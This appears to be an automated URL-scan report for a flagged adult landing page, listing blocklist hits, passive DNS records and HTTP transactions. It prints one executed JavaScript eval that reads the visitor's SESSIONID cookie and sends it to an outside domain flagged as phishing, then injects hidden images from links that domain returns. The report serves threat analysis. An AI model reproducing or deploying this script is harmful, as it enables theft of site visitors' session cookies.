Overview

URL hottime4you.com/ol/all/de/ms/25-687828?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696
IP 104.21.61.179
ASN CLOUDFLARENET
Location
Report completed 2022-10-04 07:46:05 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/js/step.js?506693 Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/css/style.css?506693 Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/js/backoffer.js Malware
2022-10-04 2 hottime4you.com/ol/all/de/ms/25-687828/images/fremdgehen69_com.png?506693 Malware
2022-10-04 2 zeniocloud.com/JAIA.js?sub1=hottime4you.com Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (18)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-10-03 09:28:24 UTC 34.117.237.239
mnemonic passive DNS alexatracker.com (1) 0 2020-10-28 18:44:06 UTC 2022-10-03 04:39:59 UTC 51.68.197.173 Unknown ranking
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-10-03 09:28:24 UTC 34.208.31.97
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-10-04 02:04:45 UTC 142.250.74.10
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-10-03 07:33:36 UTC 23.36.77.32
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-10-04 00:45:50 UTC 143.204.55.27
mnemonic passive DNS ocsp.sca1b.amazontrust.com (1) 1015 2017-03-03 15:20:51 UTC 2019-03-27 04:05:54 UTC 143.204.42.158
mnemonic passive DNS lh3.google.com (1) 213 2013-06-02 21:16:56 UTC 2022-10-04 06:29:41 UTC 142.250.74.142
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-10-03 08:07:24 UTC 143.204.55.110
mnemonic passive DNS ajax.googleapis.com (1) 12905 2013-08-16 09:51:31 UTC 2022-10-04 03:44:22 UTC 142.250.74.42
mnemonic passive DNS accounts.google.com (2) 81 2016-09-05 09:39:47 UTC 2022-10-04 05:16:29 UTC 216.58.207.237
mnemonic passive DNS static.production.almightypush.com (3) 214819 2021-09-25 16:34:18 UTC 2022-10-03 23:55:54 UTC 54.230.111.86
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-10-04 02:06:24 UTC 93.184.220.29
mnemonic passive DNS fonts.gstatic.com (1) 0 2014-08-29 13:43:22 UTC 2022-10-03 23:48:04 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-10-04 04:18:32 UTC 34.120.237.76
mnemonic passive DNS zeniocloud.com (1) 0 2022-02-16 15:44:21 UTC 2022-10-04 05:18:57 UTC 167.114.67.56 Unknown ranking
mnemonic passive DNS hottime4you.com (28) 0 2021-12-06 17:55:18 UTC 2022-10-04 04:07:17 UTC 104.21.61.179 Unknown ranking
mnemonic passive DNS ocsp.pki.goog (9) 175 2017-06-14 07:23:31 UTC 2022-10-03 07:14:52 UTC 142.250.74.3


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.21.61.179

Date UQ / IDS / BL URL IP
2022-12-08 05:49:22 +0000 0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-12-02 05:34:13 +0000 0 - 0 - 7 hottime4you.com/ol/all/fr/ms/2-442857/ 104.21.61.179
2022-11-27 14:11:15 +0000 0 - 0 - 3 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-11-23 10:07:58 +0000 0 - 0 - 3 hottime4you.com/ol/all/fr/ms/3-204829/?cep=Gg (...) 104.21.61.179
2022-11-22 21:33:27 +0000 0 - 0 - 4 hottime4you.com/ol/all/us/ms/33-142532/?cep=9 (...) 104.21.61.179

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-09 16:00:15 +0000 0 - 0 - 2 feed.helperbar.com/?publisher={Publisher}&dpi (...) 188.114.97.1
2022-12-09 15:58:38 +0000 0 - 0 - 2 accounts-newpayees.com/ 172.67.145.173
2022-12-09 15:58:07 +0000 0 - 0 - 2 diversityvisa.info/ 188.114.97.1
2022-12-09 15:56:28 +0000 0 - 0 - 14 o9e3fivjlz638f30926b0e9.semnas.ru/ 172.67.138.138
2022-12-09 15:56:19 +0000 0 - 0 - 6 cba-helpcentre.info/a1b2c3/a49d60f1d3fc8ae887 (...) 104.21.33.36

Last 5 reports on domain: hottime4you.com

Date UQ / IDS / BL URL IP
2022-12-08 05:49:22 +0000 0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/ 104.21.61.179
2022-12-04 14:21:13 +0000 0 - 0 - 5 hottime4you.com/ol/all/fr/ms/9-198919/ 172.67.212.155
2022-12-02 05:34:13 +0000 0 - 0 - 7 hottime4you.com/ol/all/fr/ms/2-442857/ 104.21.61.179
2022-11-30 11:57:21 +0000 0 - 0 - 2 hottime4you.com/ol/all/fr/ms/4-572923/?cep=sb (...) 172.67.212.155
2022-11-30 11:57:18 +0000 0 - 0 - 1 hottime4you.com/ol/all/fr/ms/3-204829/ 172.67.212.155

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-10-26 16:06:29 +0000 0 - 0 - 5 hottime4you.com/ol/all/de/ms/25-687828?cep=4g (...) 172.67.212.155
2022-10-15 18:01:40 +0000 0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 172.67.212.155
2022-10-06 06:44:17 +0000 0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 104.21.61.179
2022-09-24 19:19:54 +0000 0 - 0 - 6 hottime4you.com/ol/all/de/ms/25-687828/ 104.21.61.179
2022-09-24 15:12:11 +0000 0 - 0 - 5 hottime4you.com/ol/all/de/ms/25-687828/?cep=c (...) 172.67.212.155


JavaScript

Executed Scripts (10)


Executed Evals (1)

#1 JavaScript::Eval (size: 1851, repeated: 1) - SHA256: 8faac1d4b4b0320fa574cfea57813c83556b75306c020aec04a1dbff7a6de1ac

var Cgml = {
    apiUrl: 'https://zeniocloud.com/api/SlZpDGM75LM?domain=' + encodeURIComponent(location.protocol + '//' + location.hostname),
    self: this,
    getSession: function() {
        let sessionCookie = document.cookie.match(/SESSIONID=([^;]+)/);
        console.log(sessionCookie);
        if (sessionCookie && sessionCookie.length === 2) {
            return sessionCookie[1];
        }
        return null;
    },
    getApiUrl: function() {
        let session = this.getSession();
        if (session) {
            return this.apiUrl + '&session=' + session;
        }
        return this.apiUrl;
    },
    init: function() {
        this.domReady(() => {
            this.checkS().then(() => {
                Cgml.callApi();
            }).catch(() => {});
        });
        document.addEventListener("DOMContentLoaded", () => {
            let tst = 1;
        });
    },
    checkS: function() {
        return new Promise((resolve, reject) => {
            let img = this.stringToNode(`<img src="https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100" referrerpolicy="no-referrer" style="display: none;">`);
            document.body.appendChild(img);
            img.onerror = function() {
                reject();
            };
            img.onload = function() {
                resolve();
            };
        });
    },
    callApi: function() {
        fetch(this.getApiUrl()).then((response) => {
            return response.json();
        }).then((data) => {
            if (data.link) {
                document.body.appendChild(this.stringToNode(`<img src="${data.link}?pli=1" referrerpolicy="no-referrer" style="display: none;">`));
            }
        }).catch(function(err) {
            console.warn('Something went wrong due api call', err);
        });
    },
    stringToNode: function(str) {
        var parser = new DOMParser();
        var doc = parser.parseFromString(str, 'text/html');
        return doc.body.firstChild;
    },
    domReady: function(fn) {
        if (document.readyState !== 'loading') {
            fn();
        } else if (document.addEventListener) {
            document.addEventListener('DOMContentLoaded', fn, {
                once: true
            });
        } else {
            document.attachEvent('onreadystatechange', function() {
                if (document.readyState !== 'loading') fn();
            });
        }
    }
};
Cgml.init();
                                    

Executed Writes (0)



HTTP Transactions (67)


Request Response
                                        
                                            GET /ol/all/de/ms/25-687828?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.21.61.179
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LxJqIjp0mn8vMU9bt9LafGvSTjDOihTg1yfQW0%2FoWG5UTXnX6qwPHeK0gT47ldC1bLHRuKbOSIvoy5rMe7Zw7masPjAK1wDoNE7r8klaayeOHVUwt7aa6TulO6yhlFEtQmY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 754c4cf95917b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (518)
Size:   676
Md5:    315804a560ebefd09ca1ef7225da85b4
Sha1:   75f5232105ee96966f26cdec86789d659b6851bd
Sha256: 1ab35ee061f41502b363a8494a7748a10d5ad438e26e03b902a73b45529d1352
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1F611155394FAC39439B8EC8217D8CD493D6B588D372D264E0D66C03129C50C6"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3782
Expires: Tue, 04 Oct 2022 08:48:56 GMT
Date: Tue, 04 Oct 2022 07:45:54 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 06:47:04 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 dbfaae0db03f11cf713bbcbdb25be4a2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: Bafi4oPYjbct1xyjmTghILihyqvOV1MB_bDjSGxu034fsJ5TNCAujA==
Age: 3530


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    1b3053fa528e28810f8a2cc9284cc921
Sha1:   cca9eb471d941881a6b9a1793aecb6c281908f6a
Sha256: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.110
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 05:28:28 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 057fdebf738f5915bf38a78949190758.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: v1KAqwuL5RcJwD0JAzlPS-oP7vEdrISj3yMohMgYVaoD9iktF8wPQA==
age: 8247
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JJa7c0xm%2FRLGHv8zstxdg%2BuKNRU%2BRJyYipQ3bNmeCUSA%2BoDrGXjqC%2BU5rBKNTgG7p14vSnIzHj9kDVuj2LPh%2FsF%2FH%2FhkwkboFODXWqGjsUL8Y8R9YellMvOpiaxwBHWsDKw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 754c4cfacac3b524-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text
Size:   2446
Md5:    45767eafb625c40a5f5e7f27a115c2df
Sha1:   92f34794bf1c68b39a83a959a0bc7bdbe1fb593f
Sha256: 490d7650bcc9bd3cb03f1b5aedf44471c644c243b095b99390958dfb647e3425
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 04 Oct 2022 07:45:54 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /mng/subs_window.js?ver=1638888212 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.86
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 19491
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 07:04:47 GMT
etag: "ae593f4be1dd1f0710123918b49c4933"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: zrCKiPWXRLXkAASVh_TGBdiPYtp_OuGbIUvMVNnSiqIiV9MXkvcRUQ==
age: 2487
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   19491
Md5:    ae593f4be1dd1f0710123918b49c4933
Sha1:   66fbe30bb873e0a47d3d72e737d68aa4b6916c26
Sha256: fdf9ff3f74dcf11d0fa456dcd53cb21550f67f0cfdc11dc29bef595f07b56206
                                        
                                            GET /mng/subs_window.css?ver=1638888212 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.86
HTTP/2 200 OK
content-type: text/css
                                        
content-length: 6945
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 02:45:34 GMT
etag: "bd7dbae15f904a4e1213439ebfefddbe"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: TDaMpEtMnPy1aIKReC7bMHwmDeO8Asz2mwE9JTrITcfIoPBpuEVjzQ==
age: 18264
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   6945
Md5:    bd7dbae15f904a4e1213439ebfefddbe
Sha1:   9f7a33b3d6e7965d8b99f0ff56cbf2e2ebb8f78e
Sha256: 30c08f3bb42d9a16155c65fbc952430048e4a84be70b98cb989b2dc977b49f8a
                                        
                                            GET /ol/all/de/ms/25-687828/css/animation.css?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:25 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RRinJVa3OKp3kn%2F0Pu4NMMokXNEIlBqLLALA4n4QTqHlVCK3FvljQgfejSnTDQYnYPwQ0yEPV7wa4VQ0fsBfKtb7cDZjE63qcWCNFBxKauESrSrQdEc8gzDh34bCDZkSE70%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbcbeeb524-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text
Size:   523
Md5:    7d856f49fb85c308f7e3aade806615a1
Sha1:   a8afe132ac05e71b26e86069554a4f8fa0ba1956
Sha256: f48295eced6a46803e1b1b944fb1debb2f72c2d252dfeb0a8af0d5152b06b1d5
                                        
                                            GET /ol/all/de/ms/25-687828/js/step.js?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:33 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JsCEq3hP7TZsiIYKoNIg5yovwuyfrzY2FXk2db6P7hjpKZhTipaUwoKJcQW6N4JKF0WqiOo%2FwlztPaHnfwsvhVMWH59fsa3A0P6DQel%2FLk7zZYNouH0uas92L4IbOZ2G0h8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbee12b523-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text
Size:   865
Md5:    46a3a0281d7bd5455f99d71715bfbf53
Sha1:   9a88730bc5731b2f686aa3076ae9ec06ea78b439
Sha256: c4ad2f86a75743cff0db4e957c174c02149421b1c134fee9c84218c263320a81

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ol/all/de/ms/25-687828/css/style.css?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:25 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=filkJ2Prn%2Bzgj%2BSB%2F%2BSYr9ZKQB4orG%2Bmve5%2FJhGp0AnRUXTdxvML1l%2B8WelrwadknJYmwtSctcujTr5JqjIl4y0jy1IiOfW%2BAFj7kKhoak6ZYl78Z3XNjYA4eYOdUEYB3Lw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfbccafb4f7-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  assembler source, ASCII text
Size:   1349
Md5:    72aad72b7a7577895dce7e46bfb0bfde
Sha1:   043e7652c5f102f7aba9d6257e29e5ff583cb078
Sha256: 6089d2910cd66df85fbaf684d2275de5c73e8c7f795529e967b7e0a0deea88c9

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
